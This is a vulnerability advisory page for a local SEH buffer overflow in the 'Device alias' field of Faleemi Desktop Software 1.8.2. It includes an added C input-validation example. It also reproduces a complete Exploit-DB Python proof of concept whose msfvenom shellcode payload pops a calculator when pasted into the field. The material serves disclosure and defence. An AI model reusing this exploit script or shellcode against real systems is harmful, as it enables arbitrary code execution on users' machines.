Vendor: Faleemi Desktop Software
By: Gionathan 'John' Reale
CVSS: 7.8 (HIGH)
Type: Buffer Overflow
CWE: 119
Product Name: Faleemi Desktop Software
Affected Version From: 1.8.2
Affected Version To: 1.8.2
Patch Exists: YES
Related CWE: N/A
CPE: a:faleemi:faleemi_desktop_software:1.8.2
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 7 32bit
Year: 2018

Faleemi Desktop Software 1.8.2 – ‘Device alias’ Local Buffer Overflow (SEH)

A buffer overflow vulnerability exists in Faleemi Desktop Software 1.8.2 when a long string is entered into the 'Device alias' field. The published proof of concept is a Python script that writes the payload to a new file named 'exploit.txt'. Copying the content of 'exploit.txt' into the 'Device alias' field and clicking 'Search' triggers the overflow and results in a calculator pop-up.

Mitigation:

The vendor has released a patch to address this vulnerability.
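
The class of fix for a CWE-119 overflow in a text field such as 'Device alias' is to validate the input before copying it into a fixed-size buffer. The following is an added example, not the vendor's code or patch; `ALIAS_MAX`, `set_device_alias` and the printable-ASCII rule are assumptions, since the page does not show the affected code or state the real buffer size.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical limit: the page does not state the real buffer size. */
#define ALIAS_MAX 64

enum alias_status { ALIAS_OK = 0, ALIAS_TOO_LONG, ALIAS_BAD_CHAR, ALIAS_BAD_ARG };

/*
 * Unsafe pattern that produces this bug class (shown for contrast only):
 *     char alias[ALIAS_MAX];
 *     strcpy(alias, user_input);   // no length check: long input runs past
 *                                  // the buffer into adjacent stack data
 *
 * Hardened form: the caller passes the destination size, the input is
 * measured with a bounded scan, and the copy happens only after every
 * check has passed, so a rejected input leaves dst untouched.
 */
enum alias_status set_device_alias(char *dst, size_t dst_size,
                                   const char *src, size_t src_len)
{
    if (dst == NULL || src == NULL || dst_size == 0)
        return ALIAS_BAD_ARG;

    /* Length as a C string consumer sees it, never scanning past src_len. */
    const char *nul = memchr(src, '\0', src_len);
    size_t len = nul ? (size_t)(nul - src) : src_len;

    if (len >= dst_size)            /* must leave room for the terminator */
        return ALIAS_TOO_LONG;

    /* Assumption for this example: an alias is printable ASCII text. */
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)src[i];
        if (c < 0x20 || c > 0x7e)
            return ALIAS_BAD_CHAR;
    }

    memcpy(dst, src, len);
    dst[len] = '\0';
    return ALIAS_OK;
}
```

Rejecting overlong input, instead of silently truncating it, also gives the application a clear event to log when a field receives far more data than it should.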

Exploit-DB raw data:

# Exploit Title: Faleemi Desktop Software 1.8.2 - 'Device alias' Local Buffer Overflow (SEH)
# Author: Gionathan "John" Reale
# Discovery Date: 2018-09-25
# Software Link: http://support.faleemi.com/fsc776/Faleemi_v1.8.exe
# Tested Version: 1.8.2
# Tested on OS: Windows 7 32bit
# Steps to Reproduce: 
# Run the python exploit script; it will create a new file with the name 
# "exploit.txt". Just copy the text inside "exploit.txt", start the program and click on "Managing Log".
# In the "Device alias" field paste the content of "exploit.txt" and click on "Search". 
# You will see a calculator popped up.
 
#!/usr/bin/python
   
buffer = "A" * 219

NSEH = "\xeb\x06\x90\x90"

SEH = "\x3a\x7a\x04\x60"
nops = "\x90" * 8
#badchar \x00\x0a\x0d\x2f
#msfvenom calculator
buf =  ""
buf += "\xba\x9a\x98\xaf\x7e\xdd\xc2\xd9\x74\x24\xf4\x5f\x29"
buf += "\xc9\xb1\x31\x83\xc7\x04\x31\x57\x0f\x03\x57\x95\x7a"
buf += "\x5a\x82\x41\xf8\xa5\x7b\x91\x9d\x2c\x9e\xa0\x9d\x4b"
buf += "\xea\x92\x2d\x1f\xbe\x1e\xc5\x4d\x2b\x95\xab\x59\x5c"
buf += "\x1e\x01\xbc\x53\x9f\x3a\xfc\xf2\x23\x41\xd1\xd4\x1a"
buf += "\x8a\x24\x14\x5b\xf7\xc5\x44\x34\x73\x7b\x79\x31\xc9"
buf += "\x40\xf2\x09\xdf\xc0\xe7\xd9\xde\xe1\xb9\x52\xb9\x21"
buf += "\x3b\xb7\xb1\x6b\x23\xd4\xfc\x22\xd8\x2e\x8a\xb4\x08"
buf += "\x7f\x73\x1a\x75\xb0\x86\x62\xb1\x76\x79\x11\xcb\x85"
buf += "\x04\x22\x08\xf4\xd2\xa7\x8b\x5e\x90\x10\x70\x5f\x75"
buf += "\xc6\xf3\x53\x32\x8c\x5c\x77\xc5\x41\xd7\x83\x4e\x64"
buf += "\x38\x02\x14\x43\x9c\x4f\xce\xea\x85\x35\xa1\x13\xd5"
buf += "\x96\x1e\xb6\x9d\x3a\x4a\xcb\xff\x50\x8d\x59\x7a\x16"
buf += "\x8d\x61\x85\x06\xe6\x50\x0e\xc9\x71\x6d\xc5\xae\x8e"
buf += "\x27\x44\x86\x06\xee\x1c\x9b\x4a\x11\xcb\xdf\x72\x92"
buf += "\xfe\x9f\x80\x8a\x8a\x9a\xcd\x0c\x66\xd6\x5e\xf9\x88"
buf += "\x45\x5e\x28\xeb\x08\xcc\xb0\xc2\xaf\x74\x52\x1b"
pad = "B" * (5100 - len(NSEH) - len(SEH) - len(buffer) - len(nops) - len(buf) )

payload = buffer + NSEH + SEH + nops + buf + pad
try:
    f=open("exploit.txt","w")
    print "[+] Creating %s bytes evil payload.." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"